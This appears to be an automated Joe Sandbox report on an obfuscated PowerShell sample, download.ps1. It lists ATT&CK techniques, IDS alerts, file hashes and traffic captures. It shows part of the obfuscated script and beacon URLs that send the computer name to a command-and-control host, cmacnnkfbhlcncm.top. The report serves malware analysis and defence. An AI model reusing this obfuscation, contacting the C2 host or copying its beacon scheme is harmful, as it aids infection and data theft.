ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.217.164
truefalse
    high
    cmacnnkfbhlcncm.top
    45.61.136.138
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
        high
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?powershell.exe, 00000001.00000002.643068895319.000001A73EF06000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8Zpowershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.micpowershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://cmacnnkfbhlcncm.toppowershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKpowershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/Pester/PesterXzSpowershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.mic8powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://crl.microsoft.copowershell.exe, 00000001.00000002.643109343926.000001A7560EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.google.com/recaptcha/api.jspowershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlXzSpowershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.google.compowershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://aka.ms/pscore68powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.microsoft.cpowershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://pesterbdd.com/images/Pester.pngXzSpowershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                142.250.217.164
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                45.61.136.138
                                                                cmacnnkfbhlcncm.topUnited States
                                                                40676AS40676USfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1579001
                                                                Start date and time:2024-12-20 17:39:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 35s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                Run name:Suspected VM Detection
                                                                Number of analysed new started processes analysed:7
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:download.ps1
                                                                Detection:MAL
                                                                Classification:mal64.evad.winPS1@2/7@2/2
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 87%
                                                                • Number of executed functions: 11
                                                                • Number of non-executed functions: 5
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .ps1
                                                                • Stop behavior analysis, all processes terminated
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.111.227.13, 150.171.28.10, 23.50.115.148
                                                                • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, ctldl.windowsupdate.com, g.bing.com, nexusrules.officeapps.live.com, api.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 5908 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • VT rate limit hit for: download.ps1
                                                                TimeTypeDescription
                                                                11:41:12API Interceptor34x Sleep call for process: powershell.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/h5raxn90w1htr.php?id=user-PC&key=130484823816&s=527
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                • 107.160.112.122
                                                                QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                • 107.160.131.254
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 23.179.110.68
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                No context
                                                                No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulSiClj:NllU
                                                                MD5:E127DFF492A57525D991EFA67CD7E95D
                                                                SHA1:AD2AC988752D6DC761CC7292B07E20274E237B0A
                                                                SHA-256:6159899BF01646EE5CBC281EDFFA9D99EDD14E775713BEEB951E775C91F2AABF
                                                                SHA-512:D0CE3E4849BC35838B3879BB8CFFA24C71F695EC061C4C047F401FA5FA86CD3E712E73ECC42D3D4D800A09CFC0E3C421D3B4C4DF6D923540A15119BB3776D7FC
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:@...e...................................'............@..........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7356210492740716
                                                                Encrypted:false
                                                                SSDEEP:48:25JLS4s+CZwU2jbbukvhkvklCywcSDwfFixc5SogZoV8AjwfFixc5SogZoVpA:kO+CnoGkvhkvCCt3wfFiDHp2wfFiDHB
                                                                MD5:848762BDDE989AA45B379CEB0E687909
                                                                SHA1:AC782643299E8A2A9EF67CD9321133831D5F453B
                                                                SHA-256:506DE11B25A2DCE1F74B637704F6DCE7A8E5351CFE6E9402DAEEC49684F7AC18
                                                                SHA-512:6E9D9FC3081926BD5884F890E8B5388655D5CEB1C02D6915AAD7DFD5A55DB5817DF46E8DBDB9D0DF8B339709391C0888281A47F24C520206AE8EC930F0D46EA4
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ......A....TO...R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....._...R.......R......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<.Y...............................A.p.p.D.a.t.a...B.V.1......Y ...Roaming.@......&W.<.Y ..........................._p..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<.Y.............................RN.M.i.c.r.o.s.o.f.t.....V.1......Y.U..Windows.@......&W.<.Y...............................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<.Y......................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<.YO.....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<.Y9...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<.Y%.....8...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7356210492740716
                                                                Encrypted:false
                                                                SSDEEP:48:25JLS4s+CZwU2jbbukvhkvklCywcSDwfFixc5SogZoV8AjwfFixc5SogZoVpA:kO+CnoGkvhkvCCt3wfFiDHp2wfFiDHB
                                                                MD5:848762BDDE989AA45B379CEB0E687909
                                                                SHA1:AC782643299E8A2A9EF67CD9321133831D5F453B
                                                                SHA-256:506DE11B25A2DCE1F74B637704F6DCE7A8E5351CFE6E9402DAEEC49684F7AC18
                                                                SHA-512:6E9D9FC3081926BD5884F890E8B5388655D5CEB1C02D6915AAD7DFD5A55DB5817DF46E8DBDB9D0DF8B339709391C0888281A47F24C520206AE8EC930F0D46EA4
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ......A....TO...R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....._...R.......R......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<.Y...............................A.p.p.D.a.t.a...B.V.1......Y ...Roaming.@......&W.<.Y ..........................._p..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<.Y.............................RN.M.i.c.r.o.s.o.f.t.....V.1......Y.U..Windows.@......&W.<.Y...............................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<.Y......................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<.YO.....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<.Y9...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<.Y%.....8...........
                                                                File type:ASCII text, with very long lines (11087), with CRLF line terminators
                                                                Entropy (8bit):6.0047648383145775
                                                                TrID:
                                                                  File name:download.ps1
                                                                  File size:20'059 bytes
                                                                  MD5:506d528176abebda1202676b0528e974
                                                                  SHA1:58036f821fad918c508ed11270e2df7474b3a2e3
                                                                  SHA256:bd7cd2b13af4f8065d7970d6a6c0163ce4e155c60ae7a67062e4e17c439b1f95
                                                                  SHA512:9266f19b578ef6180585ea531c91878e1fd3d40ca204b60951746edb3eed4c7b6e119ceab1811287216c9f023bfdd511f3109a964ccaf68caf8692dac51d50a2
                                                                  SSDEEP:384:Aij/eeL5dYClhTpoPzuOInAwy7rtefXgxl5vfMim7P:zmSdjzyzuOFvtefXgxlFEF
                                                                  TLSH:CF927E95FBC8F8C2C5CEA61EA4177C443B8270AED5F3ADC4B6C5C6C1A2813556AD4D82
                                                                  File Content Preview:$vnhmefubpw=$executioncontext;$isesenarateranerenor = ([char[]]@((-7434+7487),(-6272+6324),(8401-8344),(-4633+(10159-5476)),(-6874+(2253+4677)),(378378/7007),(333592/5957),(3330-(8577225/2619)),(67595/(2169-940)),(186-136),(-5822+(7180-1302)),(28992/(3793
                                                                  Icon Hash:3270d6baae77db44
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-20T17:41:13.852263+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304984523.50.114.17443TCP
                                                                  2024-12-20T17:41:14.563032+01002859391ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.11.30584091.1.1.153UDP
                                                                  2024-12-20T17:42:17.415778+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304985323.50.114.17443TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 17:41:15.073016882 CET4984680192.168.11.3045.61.136.138
                                                                  Dec 20, 2024 17:41:15.265038013 CET804984645.61.136.138192.168.11.30
                                                                  Dec 20, 2024 17:41:15.265356064 CET4984680192.168.11.3045.61.136.138
                                                                  Dec 20, 2024 17:41:15.272520065 CET4984680192.168.11.3045.61.136.138
                                                                  Dec 20, 2024 17:41:15.464364052 CET804984645.61.136.138192.168.11.30
                                                                  Dec 20, 2024 17:41:15.516571999 CET804984645.61.136.138192.168.11.30
                                                                  Dec 20, 2024 17:41:15.564649105 CET4984680192.168.11.3045.61.136.138
                                                                  Dec 20, 2024 17:41:15.652539015 CET4984780192.168.11.30142.250.217.164
                                                                  Dec 20, 2024 17:41:15.780940056 CET8049847142.250.217.164192.168.11.30
                                                                  Dec 20, 2024 17:41:15.781150103 CET4984780192.168.11.30142.250.217.164
                                                                  Dec 20, 2024 17:41:15.781240940 CET4984780192.168.11.30142.250.217.164
                                                                  Dec 20, 2024 17:41:15.909874916 CET8049847142.250.217.164192.168.11.30
                                                                  Dec 20, 2024 17:41:16.471636057 CET8049847142.250.217.164192.168.11.30
                                                                  Dec 20, 2024 17:41:16.471668959 CET8049847142.250.217.164192.168.11.30
                                                                  Dec 20, 2024 17:41:16.471848011 CET4984780192.168.11.30142.250.217.164
                                                                  Dec 20, 2024 17:41:16.472948074 CET4984780192.168.11.30142.250.217.164
                                                                  Dec 20, 2024 17:41:16.602025986 CET8049847142.250.217.164192.168.11.30
                                                                  Dec 20, 2024 17:41:16.615920067 CET8049847142.250.217.164192.168.11.30
                                                                  Dec 20, 2024 17:41:16.616164923 CET8049847142.250.217.164192.168.11.30
                                                                  Dec 20, 2024 17:41:16.616177082 CET8049847142.250.217.164192.168.11.30
                                                                  Dec 20, 2024 17:41:16.616343021 CET4984780192.168.11.30142.250.217.164
                                                                  Dec 20, 2024 17:41:16.744822979 CET4984680192.168.11.3045.61.136.138
                                                                  Dec 20, 2024 17:41:16.744841099 CET4984780192.168.11.30142.250.217.164
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 17:41:14.563031912 CET5840953192.168.11.301.1.1.1
                                                                  Dec 20, 2024 17:41:15.062264919 CET53584091.1.1.1192.168.11.30
                                                                  Dec 20, 2024 17:41:15.521645069 CET6485853192.168.11.301.1.1.1
                                                                  Dec 20, 2024 17:41:15.651164055 CET53648581.1.1.1192.168.11.30
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 17:41:14.563031912 CET192.168.11.301.1.1.10x6d6aStandard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 17:41:15.521645069 CET192.168.11.301.1.1.10xf2c8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 17:41:15.062264919 CET1.1.1.1192.168.11.300x6d6aNo error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 17:41:15.651164055 CET1.1.1.1192.168.11.300xf2c8No error (0)www.google.com142.250.217.164A (IP address)IN (0x0001)false
                                                                  • cmacnnkfbhlcncm.top
                                                                  • www.google.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.11.304984645.61.136.138805908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 17:41:15.272520065 CET215OUTGET /kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: cmacnnkfbhlcncm.top
                                                                  Connection: Keep-Alive
                                                                  Dec 20, 2024 17:41:15.516571999 CET166INHTTP/1.1 302 Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 20 Dec 2024 16:41:15 GMT
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Location: http://www.google.com


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.11.3049847142.250.217.164805908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 17:41:15.781240940 CET159OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Connection: Keep-Alive
                                                                  Dec 20, 2024 17:41:16.471636057 CET1289INHTTP/1.1 302 Found
                                                                  Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                  x-hallmonitor-challenge: CgwIrLyWuwYQ0NarsAESBGaBmM0
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-BEeYde2zbM7DwRIs5RgBNA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Date: Fri, 20 Dec 2024 16:41:16 GMT
                                                                  Server: gws
                                                                  Content-Length: 396
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
